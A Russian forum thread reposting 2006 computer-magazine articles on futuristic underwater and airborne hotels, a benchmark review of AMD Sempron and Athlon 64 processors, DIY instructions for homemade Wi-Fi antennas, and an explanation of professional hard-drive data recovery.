Прогресс не стоит на месте. Неудивительно, что при появлении технической возможности построить «небоскреб» под водой за это взялись сразу несколько компаний, в разных точках земного шара. Например, глава проекта подводной гостиницы на 20 мест "Посейдон" (Poseidon) Брюс Джонс (Bruce Jones) получил недавно $40 миллионов от инвесторов, чтобы начать строительство роскошного отеля, в котором комнаты будут погружены более чем на 15 метров под воду. Этот пятизвездочный отель должен покоиться на океанском дне, у берега острова Элеутера на Багамах.

В отличие от "Домика Жюля", гости Посейдона не должны будут надевать подводный костюм и акваланг, чтобы попасть в отель. Все будет цивильно – лифт с поверхности доставит под воду всех желающих. В роскошные номера ($1,5 тысячи за ночь, это даже не $395!) постояльцы попадут по внутреннему эскалатору. Естественно, давление в отеле будет обычным, атмосферным, что исключает возникновение кессонной болезни. Все наружные стены отеля планируют сделать прозрачными благодаря современным полимерным материалам. Так создастся впечатление, что ты на самом деле живешь под водой.

Издательский дом ООО "Гейм Лэнд" ЖУРНАЛ ХАКЕР #90, ИЮНЬ 2006 г.


Квартирный вопрос

Юрий Свидиненко aka Lazarus

Хакер, номер #090, стр. 090-046-7


--------------------------------------------------------------------------------

Мало того – у каждой жилой комнаты площадью 51 м2 будут огромные прозрачные акриловые окна, открывающие роскошный вид на коралловые сады. Номера будут оснащены джакузи и другими вкусностями, без которых не обходится ни один люкс. Пульты управления позволят постояльцам включать и выключать освещение дна близ своего номера и даже дистанционно кормить рыбок, привлекая их к окнам.

Внутри этот отель совсем не будет походить на внутренние отсеки какой-нибудь субмарины. В отделке здесь будут использованы дорогие ткани, кожа и мрамор. А большой ресторан гостиницы будет совершать один оборот вокруг своей оси за час, позволяя обедающим не сходя с места увидеть все достопримечательности близлежащего дна. Не будем сомневаться в том, что в отеле будет шлюзовая камера для аквалангистов и прогулочная субмарина.

Другой проект арабских шейхов – настоящий подводный город. Вместо 20-ти мест в Посейдоне Гидрополис, строящийся сейчас в Дубаи на берегу Персидского залива, предложит 220! И по демократичным ценам: жить на глубине 20 метров в люксе с высококлассным обслуживанием будет стоить всего $500 за ночь (это не аскетичный Домик Жюля). На закуску – подводные концертный зал, танцзал и ресторан (ну и, естественно, подводные сады, субмарины, прогулки с аквалангом и т.п.).

Гидрополис станет самым роскошным и впечатляющим подводным зданием. Достаточно сказать, что его подводная площадь (не считая наземной части, где будет расположена, например, стойка администратора) составит 75 тысяч квадратных метров.

Но самым главным и самым притягательным сооружением Гидрополиса будет танцевальный зал, купол которого будет частично выходить из-под воды, открывая гостям одновременно вид и на подводный мир, и на небо, а в его вершине красивыми ночами может открываться окно, давая возможность звукам и свету проникать "на дно отеля". Эта красота подкреплена современным оборудованием лазерной подсветки. В общем, постояльцы Гидрополиса скучать не будут.

Воздушные замки

Небо тоже еще не до конца освоено – так считает большинство футуристов. Но осваивать его «по полной» невыгодно – слишком мало тогда света будут получать жители и так темных техноскребов.

Самый лучший вариант, который позволит переселить часть людей с земли на небеса – мобильные летающие мини-города.

Ты, может, знаешь о трагической судьбе мегадирижабля «Гиндербург», который сто лет назад взорвался на финише первого воздушного трансатлантического рейса. После этой трагической случайности к дирижаблям (хоть они уже и летают на невзрывоопасном гелии) относятся с опаской. А зря, ведь они – основа «небесного царства».

Только представь себе: летающая гостиница для 250-ти богатых пассажиров. На борту корабля-отеля длиной в два футбольных поля есть все, включая рестораны и казино. Это уже не назовешь дирижаблем, скорее это – летающий отель Aeroscraft.


Несмотря на то, что этот монстр тяжелее воздуха, его 396 тысяч кубометров гелия поднимают две трети веса — взлететь кораблю с 400-тонным полезным грузом помогают шесть турбовентиляторных реактивных двигателей. Двигаясь со скоростью 280 км/час, судно может пересечь континентальные Штаты примерно за 18 часов, а вообще диапазон действия Aeroscraft – около 10-ти тысяч км.

Размеры корабля впечатляют: высота - 50 метров, ширина - 74 метра, длина - 197 метров. Но притом, что это воздушное судно крупнее любого авиалайнера, ему на земле требуется меньше места, чем любому другому самолету, потому что Aeroscraft не нуждается во взлетно-посадочной полосе: он взлетает и приземляется, как вертолет. В том числе – на снег или воду. Самое интересное, что придумал такое чудо наш соотечественник Игорь Пастернак, который после развала совка уехал в США и там организовал свою фирму - Aeros. По оценкам Пастернака, строительство отеля Aeroscraft обойдется примерно в $46 миллионов. 150-местный Boeing 737 стоит столько же, но его эксплуатация стоит вдвое дороже. Aeroscraft сейчас находится на ранних стадиях развития опытного образца, но, как ожидается, полностью проект будет закончен к 2010-му году — несколько компаний выразили уже свой интерес, и в первую очередь военные – для транспорта техники и пехоты.

Об орбитальных гостиницах мы вскользь упоминали в мартовском выпуске Импланта. Эта тема еще не проработана как следует, и, возможно, переселение на орбиту реально начнется при будущей экспансии человечества в космос.

Как видишь, при грамотном использовании места можно еще жить и жить. Только одно дело жить в тесном муравейнике без света, а другое – в зеленой башне или в красивом городе под водой. При грамотном подходе место найдется и для брательника, и для подруги, и для бабки, вот только не все у нас в мире делают по-грамотному. Так что смотри в оба, чтобы в один день ты не проснулся в супермаркете wink.gif.

Первый город будущего хотел построить еще Уолт Дисней…

В ноябре 1965-го года Уолт Дисней объявил, что купил-таки землю своей мечты — болото неподалеку от Орландо, во Флориде. Выступая на пресс-конференции по поводу этого радостного для себя события, Дисней намекнул, что хочет на новоприобретенном участке построить нечто большее, чем очередной Диснейленд. И действительно, впоследствии выяснилось, что Дисней в строжайшей тайне занимался любимым проектом, который в приватных беседах называл Project X.

Город будущего EPCOT планировался как сердце Мира Диснея — гигантского Disney World, общая площадь которого 43 квадратные мили (около 70 квадратных км), что вдвое больше Манхеттена. Он должен был быть абсолютно круглым, как колесо. Да, Дисней с колесом радиальный план и сравнивает. По замыслу Диснея, в городе должны были быть 30-этажная гостиница и деловой центр, магазины, театры, рестораны, ночные клубы, жилые и офисные здания — полностью закрытая окружающая среда с минимумом движения внутри. Точнее, так: в центре колеса — главный небоскреб. Потом зеленое кольцо, а затем — жилая пригородная зона. Сообщение между центром и периферией осуществляется как по "спицам колеса", так и по "кольцевой". Через весь город поперек проходит слева направо центральная магистраль.

Но притом, что королем дорог был объявлен пешеход, жителей совершенного города предполагалось обеспечить самыми современными и экологически чистыми видами транспорта: высокоскоростными монорельсовыми дорогами, человековозами ("People Movers"), электрическими такси типа конвейера и тому подобным. Где-то должен был быть и аэропорт будущего.

Так или иначе, но экспериментальное сообщество завтрашнего дня не появилось. Уолт Дисней скончался от рака легких 15 декабря 1966-го года.

Говорят, что реальный EPCOT, построенный после смерти Диснея, но не соответствующий грандиозности его замыслов, остается замороженным.




Автор: Metallica Nov 20 2006, 11:00

Драгоценные камни

Тестирование современных процессоров от AMD

Этот материал будет полезен в первую очередь тем, кто уже заранее определился с выбором типа платформы для своего будущего компа и склоняется больше к процессорам от компании AMD. Мы надеемся, что с помощью данного обзора, ты сможешь не только ознакомиться с предлагаемыми на рынке процессорами, но и получишь поверхностное представление о технологических особенностях камней.

Тестируемое оборудование

AMD Sempron 3000+

AMD Sempron 3100+

AMD Sempron 3300+

AMD Sempron 3400+

AMD Athlon 64 3000+

AMD Athlon 64 3500+

AMD Athlon 64 X2 3800+

AMD Athlon 64 X2 4200+

Тестовый стенд Socket 939

Материнская плата: GigaByte GA-K8NF-9, nForce4

Кулер: AMD BOX

Память, Мб: 1024, PC3200(400Mhz) Patriot (PSD1G400)

Винчестер, Гб: 80, Seagate Barracuda, 7200rpm

Видеоплата: 256, ASUS EN6600GT HTD, PCI-E

Оптический привод: ASUS DRW-1608P

Блок питания, Вт: 350, AcBel (API4PC28)

Тестовый стенд Socket 754

Материнская плата: GigaByte GA-K8NE nForce4

Кулер: AMD BOX

Память, Мб: 1024, PC3200(400Mhz) Patriot (PSD1G400)

Винчестер, Гб: 80, Seagate Barracuda, 7200rpm

Видеоплата: 256, ASUS EN6600GT HTD, PCI-E

Оптический привод: ASUS DRW-1608P

Блок питания, Вт: 350, AcBel (API4PC28)

ЭКОНОМИЧЕСКИЙ АСПЕКТ

Обратим для начала свое внимание на динамику изменения цен на процессоры компании AMD. Вполне возможно, что ты заметил, как сильно подорожали камешки у конкурента Intel, и сильно засомневался в разумности выбора процессоров именной этой марки. Давай постараемся разобраться в сложившейся ситуации. Итак, все мы привыкли к тому, что со временем цены на «камни» должны падать в связи с развитием технологий. Появляются новые, более современные, дорогие и мощные решения, и, соответственно, на железо предыдущего поколения цены снижаются. Однако, совсем недавно картина резко изменилась. В прошлом, 2005 году, вплоть до конца июля цены на линейку камней AMD Athlon 64 постепенно падали. Однако, начиная с осеннего периода и кончая февралем нынешнего года, цена на процессоры марки AMD выросла на 50-60 %. Сложившееся положение вещей может быть объяснено только высоким спросом на процессоры серии Athlon 64. Как следствие, образовался дефицит недорогих процессоров AMD. Мало того, компания AMD столкнулась с проблемой подорожания на внутреннем рынке кремниевых пластин. Однако, на данный момент цены упали до июльских и ситуация более-менее стабилизировалась, так что причин для серьезного беспокойства нет. Сейчас разумно брать именно процессоры AMD – конечно пока не случился еще один катаклизм, и как следствие, сильный рост цен.

ТЕХНОЛОГИИ

Поскольку в нашем тесте представлены процессоры трех марок, а именно AMD Athlon 64 X2, AMD Athlon 64 и AMD Sempron, то нам стоит разобраться в различиях между данными типами камней. Процессоры категории Sempron представляют собой наиболее доступный по ценовому критерию вариант. Его отличают небольшой объем кэша второго уровня – либо 128, либо 256 Кб в зависимости от типа процессора. Изготовляются данные камешки под 754 сокет, однако недавно появились более дорогие варианты под 939 разъем. Соответственно, последний покупателю дороже выйдет, но зато эстетам приятно. Построены CPU Sempron на ядре Palermo и, в принципе похожи на давно известные Athlon XP с измененной формулой расчета процессорного рейтинга. К созданию AMD Athlon 64 инженеры подошли серьезнее. Размеры кэша L2 повышены до 512 и 1024 Кб в зависимости от модели. Их отличают от предыдущих камешков улучшенная 64-разрядная архитектура, которая позволяет осуществлять обработку как 32-разрядных, так и 64-разрядных приложений. Выделяются они также поддержкой и использованием таких широко известных технологий AMD как Cool ‘n’ Quiet и HyperTransport. Здесь в основном используются ядра San Diego (для более мощных процессоров) и Venice. Следующий класс процессоров AMD Athlon 64 X2 представляет собой два процессора одновременно интегрированных на один кристалл. Следовательно, такой CPU получает удвоенную производительность, особенно в многозадачном режиме. К сожалению, за это и заплатить придется приличные деньги.

Методика тестирования

Для тестирования был использован стандартный набор программ. Помимо синтетического бенчмарка 3D Mark 2005 били также задействованы WinRaf и SuperPI. В качестве игрового приложения был выбран продукт Half-Life 2 – столь популярный среди геймеров всего мира. При этом разрешение было понижено до минимума 640х480 для наибольшей зависимости результата от процессора. Кроме того, с помощью утилиты Gordian Knot осуществлялась обработка видеопотока кодеком DivX 5.11 и сжатие аудиофайла в формат MP3 кодеком Lame. Тесты с разгоном осуществлялись по стандартной в таких случаях методике. Ступенчато повышалась частота FSB с последующей регулировкой подаваемого напряжения для получения максимального и вместе с тем стабильного результата.

AMD Sempron 3000+

Частота работы, ГГц: 1.8 ГГц

Кэш L2, Кб: 128

Технология, мкм: 0.13

Ядро: Palermo

Частота шины: 1600

Разъем: 754 Socket

Начнем наш обзор с самой младшей модели в линейке камней AMD Sempron. Обладая серьезной частотой в 1.8 ГГц, этот малыш способен составить серьезную конкуренцию существующим бюджетным решениям. Слабый кэш не мешает данному устройству показывать хорошие результаты, как в играх, так и в рабочих приложениях. Между тем, возможности ядра Palermo и платформы Socket 754 делают свое дело, и на фоне тех же процессоров AMD Athlon XP рассматриваемый камешек выглядит более уверенно.

Очень слабый кэш данного устройства объемом в 128 кб – это еще пол беды. Учитывая то, что AMD рассчитывает окончательно избавиться от 0.13 мкм процессоров в производственной программе, то тут процессоры Sempron не являются исключением. Выгоднее, на наш взгляд выглядят камешки семейства AMD Athlon 64, которые не только производительнее и функциональнее, но и не сильно отличаются по цене – взять хотя бы тот же AMD Athlon 64 3000+, который отличается от рассматриваемой модели всего на пару десятков «зеленых президентов».

AMD Sempron 3100+

Частота работы, ГГц: 1.8 ГГц

Кэш L2, Кб: 256

Технология, мкм: 0.13

Ядро: Palermo

Частота шины: 1600

Разъем: 754 Socket

Как ты можешь убедиться, изучив технические характеристики, этот камень сильно от предыдущего AMD Sempron 3000+ не отличается, разве что инженерами был в два раза увеличен кэш второго уровня. Для данного процессора обеспечивается поддержка всевозможных: IA-32, 3Dnow, enhanced 3Dnow, SSE, SSE2 и MMX. AMD Sempron 3100+, как и предыдущий, имеет поддержку технологии Cool ‘n’ Quiet и антивирусной защиты, предоставленной NX-битом. Разгоняется этот CPU хорошо, благодаря тому, что является практически самым младшим в линейке, так что оверклокерам есть, где разгуляться.

К сожалению, в связи с особенностями платформы c поддержкой Socket 754, контроллер памяти располагается на процессоре, а не в чипсете. Так что стоит забыть о работе памяти в двухканальном режиме.

AMD Sempron 3300+

Частота работы, ГГц: 2 ГГц

Кэш L2, Кб: 128

Технология, мкм: 0.9

Ядро: Palermo

Частота шины: 1600

Разъем: 754 Socket

Этот процессор - еще один представитель линейки Sempron в нашем тесте. К выпуску данного устройства производители материнских плат основательно подготовились. Ведь именно Sempron 3300+ за счет своего высокого множителя - 10.0х позволит разгонять ядро Palermo степпинга E до частот свыше 2.6 ГГц. Дело в том, что большинство продаваемых до этого материнских плат под Socket 754 не могут похвалиться возможностью гарантированной работы на частоте тактового генератора порядка 300 МГц. Такой высокий множитель снимает проблему, так как для достижения частоты 2.6 ГГц тот же Sempron 3300+ нужно будет разогнать "всего лишь" до 260 МГц по шине. Так что важность данного устройства для оверклокеров со скромными финансовыми возможностями неоценима.

Кэш второго уровня безжалостно урезан до 128 Кб, так особо выдающейся производительностью этот камешек не блещет. До роли процессора под игровые платформы данное устройство явно не дотягивает, а под бюджетные системы такой камень ставить дороговато.

AMD Sempron 3400+

Частота работы, ГГц: 2 ГГц

Кэш L2, Кб: 256

Технология, мкм: 0.9

Ядро: Palermo

Частота шины: 1600

Разъем: 754 Socket

В последнее время стремительно растет ассортимент процессоров марки Sempron. Вот и пополнился он новой моделью AMD Sempron 3400+. Причины побудившие компанию AMD к такому шагу вполне понятны. Процессоры AMD Sempron дают новую жизнь Socket 754 и возможность сбыть со складов устаревшие марки материнских плат. Данный девайс по сравнению с предыдущей моделью в линейке Sempron 3300+ обладает увеличенным объемом кэша второго уровня – 256 Кб против 128 Кб в предыдущем варианте. Однако, архитектура K8 не так выигрывает от увеличения объема кэша, как от увеличения тактовой частоты. Отсюда и такая разница в рейтинговых «плюсах» названия. Здесь процессоры отличаются всего на 100 единиц, в отличие от более ранних моделей, где мы наблюдали разницу в 200 «плюсов».

Новинки всегда бьют по карману потребителя. Вот и теперь производитель не стремится снижать цены на новое, и, в то же время, устаревающее оборудование.

AMD Athlon 64 3000+

Частота работы, ГГц: 1.8 ГГц

Кэш L2, Кб: 512

Технология, мкм: 0.9

Ядро: Venice

Частота шины: 1800

Разъем: 939 Socket

Имеются предположения, что модель AMD Athlon 64 3000+ представляет собой отбракованную версию процессора AMD Athlon 64 3200+, у которой, по какой-то причине не заработал 1 Мб кэш полностью. То же мы могли наблюдать и с процессорами семейства AMD Duron. Между тем, радует то, что инженеры компании AMD не стали изменять другие параметры процессора, и, в остальном, модель типа 3000+ ничем не отличается от модели 3200+. И если бы не заниженный объем кэша, который все-таки влияет на производительность, рассматриваемый процессор стал бы отличным выбором. Поскольку этот камень является самой младшей моделью в линейке Athlon 64, то он обладает отличным разгонным потенциалом. Все радости современной жизни к процессору прилагаются – 64-битная архитектура и поддержка Cool ‘n’ Quiet.

Не взирая на все достоинства данного процессора, назвать его игровым довольно сложно. Так что фанатам погони за FPS рекомендуется поискать что-то более мощное.

AMD Athlon 64 3500+ (Лучшая покупка)

Частота работы, ГГц: 2.2 ГГц

Кэш L2, Кб: 1024

Технология, мкм: 0.9

Ядро: Venice

Частота шины: 2000

Разъем: 939 Socket

Это - самый мощный процессор из представленных в тесте одноядерных камней. Суди сам - при довольно высокой частоте работы кристалла, данное устройство обладает хорошим объемом КЭШа второго уровня – целый мегабайт. При этом он наделен всеми доступными на сегодняшний день технологиями от AMD – процессор от излишнего нагрева спасет Cool ‘n’ Quiet, а NX-бит станет отличным помощником твоему антивирусу. Между тем обрати внимание на разгонный потенциал данного устройства. Конечно, тебе может попасться процессор, который будет гнаться хуже – это как повезет. Однако, наш подопытный экземпляр дал 26-процентный прирост по производительности, что только характеризует его с хорошей стороны. Особенным плюсом можно назвать его цену – на сегодняшний день данный процессор является отличным выбором для ПК средней ценовой категории.

Именно потому, что особенных минусов замечено не было и данное устройство показало себя с лучшей стороны, мы вручаем ему награду «Лучшая покупка» за оптимальное соотношение качества и цены.

AMD Athlon 64 X2 3800+ (Выбор редакции)

Частота работы, ГГц: 2 ГГц

Кэш L2, Кб: 2 x 512

Технология, мкм: 0.9

Ядро: Manchester (2 x Venice)

Частота шины: 2000

Разъем: 939 Socket

Данный процессор является самой младшей моделью в линейке двуядерных устройств от AMD, что не мешает ему показывать феноменальную производительность. Контролеры памяти и шины Hyper Transport у двуядерных процессоров AMD общие, стало быть, оба ядра делят их между собой. Особым плюсом является возможность установки таких процессоров на любую материнскую плату, способную выдержать AMD Athlon 64 FX. Правда, с предварительным апгрейдом BIOS’а платы. Гонится такой девайс гораздо лучше, в отличие от того же AMD Athlon 64 X2 4200+. Между тем все необходимые радости для высокотехнологичной жизни имеются – и поддержка 64-битного софта, и Cool ‘n’ Quiet, и NX-бит. Между тем, у данного процессора довольно низкий уровень тепловыделения, что по нраву придется всем.

Данный камень и попрекнуть не в чем – и разгоняется лучше старших собратьев, и стоит не так дорого, как мог бы. Потому, на наш взгляд и нет причин, чтобы не вручить премию «Выбор редакции» за самый лучший трудовой результат.

AMD Athlon 64 X2 4200+

Частота работы, ГГц: 2.2 ГГц

Кэш L2, Кб: 2 x 512

Технология, мкм: 0.9

Ядро: Manchester (2 x Venice)

Частота шины: 2000

Разъем: 939 Socket

Отличается от предыдущего собрата AMD Athlon 64 X2 4200+ только частотой. Она на 0.2 ГГц больше, чем в предыдущем варианте. Это позволяет ему отлично справляться, как со стандартными задачами, так и с мультизадачностью. Прикупив такой камешек, не забудь обновить свой BIOS или заранее приобрести материнскую плату с поддержкой двуядерных процессоров AMD. Иначе процессор будет работать только в половину своей могучей силы. Между тем, сам понимаешь, что такое устройство полностью экипировано инженерами всем необходимым от Cool ‘n’ Quiet до NX-бита, так что разочарованным ты не останешься.

Такой процессор можно смело назвать HI-End’ом, ведь его цена действительно оправдывает это звание. За такие деньги можно приобрести бюджетный системник. Однако может быть кому-то это будет и по карману, поскольку за полгода процессоры под маркой X2 успели солидно подешеветь примерно на 35 процентов. Так что если поднапрячься, можно взять и сейчас.

ВЫВОДЫ

Все представленные в обзоре процессоры имеют свои слабые стороны, у одних - высокая цена, а у других - низкая производительность. Но, раздавая награды, мы старались быть наиболее объективными. Гражданам, подыскивающим недорогой процессор под домашнюю систему, советуем обратить внимание на варианты типа AMD Athlon 64 3000+ или AMD Sempron 3300+. Для машины категории «и поиграть, и поработать» рекомендуем победителя в номинации «Лучшая покупка» AMD Athlon 64 3500+. А желающим собрать сильный агрегат и при этом сэкономить отлично подойдет камень AMD Athlon 64 X2 3800+, который мы наградили призом «Выбор Редакции».




Автор: Metallica Nov 20 2006, 13:43

Сигналим без пощады

Спиральная антенна

Что нужно

Стафф: Пластиковая труба диаметром 40 мм и длиной 0.5 метра.

Достать: Хозяйственный магазин

Деньги: 50р

Стафф: Термоусадка диаметром 52 мм и длиной 0.5 метра.

Достать: Радиорынок

Деньги: 150р

Стафф: Медная проволока. Диаметр сердечника 1.5 мм. Длина 4 метра.

Достать: Радиорынок или хозяйственный магазин

Деньги: 30р

Стафф: Алюминевая пластина. Толщиной должна быть пару миллиметров.

Достать: Пункт приема цветных металлов. Дворник с алюминиевой лопатой. Свалка с мусором.

Деньги: Бесплатно. Если у дворника, 50р.

Стафф: N-type коннектор.

Достать: На радиорынках редкость. Можно купить в инете: www.mobile-locman.ru.

Деньги: 300р

Стафф: Болт с гайкой

Достать: Достать, надеюсь, не проблема

Деньги: Бесплатно

Стафф: Клей Момент

Достать: У любого токсикомана всегда есть тюбик

Деньги: 20 р

Инструмент: Электродрель

Достать: У рукастого соседа сверху. Потом покажешь ему свою антенну.

Инструмент: Болгарка, лобзик или ножовка по металлу.

Достать: В шкафу с дедушкиными инструментами

Инструмент: Паяльник 100 Вт

Достать: Радиорынок, 80 р.

Инструмент: Сверло 16 мм. Можно поменьше, но будет геморрой.

Достать: Хозяйственный магазин

По пунктам:

1. Аккуратно намотай на трубу 12 витков провода, подгони один к одному, чтобы обмотка нигде не топорщилась

2. Аккуратно сними полученную спиральку с трубы

3. На трубе через каждые 33 мм нарисуй 12 рисок

4. Обмажь трубу клеем «Момент» и подожди чуть-чуть

5. Аккуратно надеть на трубу спиральку из провода, разположив витки по отмеченным рискам

6. Прижми со всей силы спиральку к трубе, чтобы приклеилась. Держать нужно минут 10

7. Когда проволока приклеится, надень на трубу термоусадку и обрежь по месту

8. При помощи фена или газовой плиты раномерно нагрей трубу с еще болтающейся термоусадкой. Она сразу начнет съеживаться.

9. Когда пластик обтянет трубу с проволокой, дай будущей антенне остыть

10. Из алюминиевого листа вырежи квадрат со стороной около 20 см

11. В центре просверли дырку 5 мм сверлом

12. Прикрути к пластине-отражателю пластиковую заглушку трубы

13. Рядом с заглушкой просверли 16 мм сверлом дырку под коннектор. Если у тебя сверло меньше, чем 16 мм, можно увеличить дырку, наклоняя дрель из стороны в сторону

14. Припаяй к концу обмотки иглу коннектора

15. Вставь ее внутрь и закрепи коннектор

16. Вставь трубу в заглушку

17. Остаток кабеля легко выбрать, слегка повернув трубу вокруг своей оси

Антенна-банка

Банка диаметром 7-10 см и соответствующей длиной. Хорошо подошла из-под дрянного растворимого кофе. Основное требование – чтобы была нерифленой, то есть с гладкими стенками.

В супермаркете

В зависимости от содержимого банки.

Стафф: N-type коннектор.

Достать: На радиорынках редкость. Можно купить в инете: www.mobile-locman.ru.

Деньги: 300р

Кусок проволоки




Автор: Metallica Nov 20 2006, 17:54

Привет с того света




Вся правда о восстановлении данных

Парадокс, но самые важные данные мы с завидным упорством храним на жестком диске, который справедливо можно назвать самой ненадежной частью нашего компьютера. И вот, когда он в очередной раз посыплется, мы опять будем чесать репу и винить себя за то, что не сделали бэкап. А быть может, вообще начнем паниковать, если на диске были данные чрезвычайной важности. Единственное решение в данной ситуации — нести накопитель специалистам и ждать, пока они прооперируют. Так вот о том, как гуру восстанавливают данные с убитых накопителей, расскажет Хозяинов Николай, директор московской фирмы R.LAB.

Невозможное возможно

Спешу тебя обрадовать. Вне зависимости от того, определяется ли жесткий диск при загрузке компьютера, раскручивается он или нет, надежда есть всегда. Как в случае аппаратных, так и программных неполадок вероятность успешного восстановления данных примерно одинакова и, согласно статистике R.LAB, составляет порядка 90%. Цифра, согласись, обнадеживающая.

Далее мы будем рассматривать основные виды проблем, которые могут случиться с хардом. Но, чтобы правильно понять их суть, стоит проинструктировать тебя о внутреннем устройстве харда. Основные его компоненты — это плата управления (она же контроллер) и гермоблок (так называемая банка). На плате находятся ОЗУ, ПЗУ, процессор и другая электроника, необходимая для передачи и обработки всевозможных сигналов, а также управления содержимым гермоблока. В самом гермоблоке расположен шпиндельный двигатель с одним или несколькими магнитными дисками (блинами) и блок магнитных головок (БМГ), с микросхемой коммутатора. Гермоблок, несмотря на свое название, у большинства современных жестких дисков герметичным не является. Он сообщается с атмосферой через специальный фильтр для выравнивания давлений. Кроме того, внутри гермоблока стоит специальный фильтр, который постоянно очищает находящийся внутри воздух. В случае повреждения поверхности блина, частички магнитного слоя оседают на этом фильтре, и он темнеет.

Помимо исправного состояния железа, необходимо четкое соответствие версии микропрограммы в ПЗУ платы управления и специальной информации в служебной зоне жесткого диска именно этому гермоблоку и плате управления. Мало этого, на некоторых моделях жестких дисков нанесение сервометок (низкоуровневая разметка поверхности диска осуществляемая на заводе) выполнено таким образом, что для работы диска контроллеру еще нужна адаптивная информация, уникальная для каждого экземпляра этой модели. Как правило, она содержится одновременно в ПЗУ и служебной зоне.

Логические ошибки

Если носитель исправен, то потеря информация чаще всего происходит как результат возникновения ошибок в таблице разделов или в структурах файловой системы. Это может произойти, например, из-за некорректного выключения компьютера, сбоев в работе программного и аппаратного обеспечения. В большинстве случаев данные при этом физически остаются на диске, но теряются сведения об их расположении. Выражается это в исчезновении одного или нескольких разделов жесткого диска, отображении раздела с файловой системой как неотформатированного, исчезновении отдельных файлов и каталогов. К этой же категории относится и восстановление случайно удаленных файлов.

Реанимация данных осуществляется с помощью специального софта, в полуавтоматическом режиме или вручную. При использовании полуавтоматических способов сначала производится сканирование всех данных, содержащихся на носителе. После чего на основе обнаруженной служебной информации составляется карта расположения фрагментов восстанавливаемых данных. На этой карте отображены сведения о том, какой кластер к какому файлу относится, а также размеры, названия и другие атрибуты элементов сканируемой файловой системы. Затем выбранные данные переносятся (то есть восстанавливаются) на другой жесткий диск.

В некоторых нетипичных случаях, несмотря на наличие данных на диске, программы их обнаружить не могут, и тогда в дело вступают программы для редактирования содержимого диска на низком уровне, а также прямые руки специалиста. Например, был случай, когда на USB-флэшке ни одна программа не могла найти нужные файлы. Специалист посмотрел и выяснил, что значительная часть FAT отсутствует, а на ее месте находится непонятный мусор. Во время дальнейшего изучения инженер обнаружил недостающий кусок в конце накопителя и скопировал его на надлежащее место. После этого все сразу нашлось и корректно открылось. Как могла возникнуть подобная неисправность, непонятно.

Сбойные сектора

Вышеперечисленные ошибки, влекущие за собой логическую потерю информации, могут возникнуть из-за наличия блоков, которые читаются с ошибками (бэд-сектора). К ним добавляются ошибки чтения-записи. Если у тебя ни с того ни с сего перестала загружаться винда, то, скорее всего, это произошло из-за появления бэд-секторов. На современных накопителях всегда присутствует какое-то количество сбойных секторов, которые с помощью специального алгоритма исключены из использования и прозрачно заменены нормально работающими секторами с резервных цилиндров. Если в процессе работы микропрограмма диска обнаруживает сектор, который начинает сыпаться, она переносит с него данные на резервный и вносит его в список сбойных секторов. Для определения того, что сектор посыпался, есть свои методы и критерии. Например, если не удается правильно считать данные с первого раза, то он чаще всего считается сбойным. Таким образом, здоровье диска определяется, скорее, не наличием бэдов, а скоростью их появления. Бэды становятся видимыми, когда кончаются резервные секторы или алгоритм замены не срабатывает должным образом. Если количество бэдов небольшое (меньше 50), то восстановление данных можно провести теми же средствами, как и в случае логических ошибок. Если же бэдов много, то лучше снять посекторную копию на другой винт и затем работать уже с ней. Кроме того, существуют программно-аппаратные комплексы, специально предназначенные для вычитывания информации с дисков, имеющих бэд-сектора. Используя различные способы, они позволяют считывать из бэд-секторов информацию, доступ к которой не удается получить обычным способом. В специализированных организациях для работы с посыпавшимися дисками используется именно такое оборудование.

Ошибки в служебной информации

Нередко встречаются ситуации, когда накопитель физически исправен, но нормально не функционирует из-за сбоя в работе микропрограммы контроллера. В такой ситуации жесткий диск не определяется в BIOS или определяется неправильно, может издавать странные звуки, например, стучать. Иногда носитель определяется корректно, но при дальнейшей загрузке BIOS опять же выдает ошибку. Причины появления ошибок в служебке могут быть разными: начиная от неправильного реагирования на переполнение таблицы бэдов и заканчивая производственным браком при пайке процессора.

Или вот другой пример. В результате скачка напряжения сгорела плата управления на жестком диске (при этом коммутатор и головы, что часто бывает, остались целыми). Опытный админ решил попробовать восстановить данные самостоятельно. Для этого он купил такой же диск и перекинул контроллер на сгоревший. Только он не учел того, что у них разная карта голов и версии микропрограмм отличаются. У диска внутри один блин, но у одного экземпляра голова расположена сверху, а у другого — снизу. Запустив диск после перекидывания контроллера, админ незаметно для себя стер с винта всю служебную информацию и прибавил работу настоящему специалисту. Чтобы избежать этого печального результата, нужно предварительно залить в ПЗУ правильную версию микропрограммы исправного контроллера. Делается это, как правило, с помощью специализированного оборудования и программного обеспечения. На нем же восстанавливается и содержимое служебной зоны диска. После этого, в случае отсутствия других неисправностей, диск работает нормально.

Совсем по-другому производятся работы, если микропрограмма не может читать служебную информацию из-за наличия бэдов. При таком раскладе используются самые экзотические методы, доступные специалистам. О них рассказывать нет смысла.

Неисправный контроллер

Выход контроллера из строя может произойти по разным причинам, в том числе из-за скачка напряжения, банального перегрева и производственного дефекта. При этом диск стучит или не определяется при загрузке компьютера. А может, даже не раскручиваться.

Работа по восстановлению данных, в основном, заключается в замене или ремонте контроллера. Иногда требуется также перепрошивка микропрограммы или другой служебной информации. После ремонта восстановление данных происходит, как с исправного накопителя.

Неисправности в гермозоне

Этот тип неисправности чаще всего вызывает стук или скрежет в гермоблоке. Исключение — залипание головок и клин двигателя (в этом случае диск не раскручивается). Накопитель может как определяться, так и не определяться BIOS’ом. При выходе из строя одной или нескольких магнитных головок или коммутатора, для восстановления данных требуется вскрытие гермоблока и замена всего БМГ с коммутатором. В редких случаях, при выходе из строя коммутатора и исправных головках, БМГ не меняется, и производится перепайка коммутатора с исправного блока.


В случае залипания производится вскрытие гермозоны и отвод головок в зону парковки. Заклинивание двигателя устраняется его ремонтом или пересадкой блинов на исправный накопитель. После этого с диска производится копирование информации. В специализированных организациях для этого, как правило, используется то же оборудование и программы, что и для работы с посыпавшимися дисками.

Работы со вскрытием гермозоны рекомендуется проводить в специальных помещениях с высочайшим уровнем частоты или сконструированных для этих целей небольших камерах (аквариумах). Однако нередко работы осуществляются в обычном помещении, после чего перед закрытием крышки гермоблок продувается чистым воздухом из баллона. Практика показывает, что достигнутого таким образом уровня чистоты достаточно для нормальной работы диска в течение десятков часов, что вполне достаточно для снятия нужных данных.

После вскрытия гермоблока диск, в отличие от других случаев, к дальнейшему использованию не пригоден. Специалистам остается только считать данные и, грубо говоря, выкинуть его. Причина этого — недостаточный уровень точности и чистоты, необходимый для надежной работы диска. Такой уровень достижим только на заводе производителя.

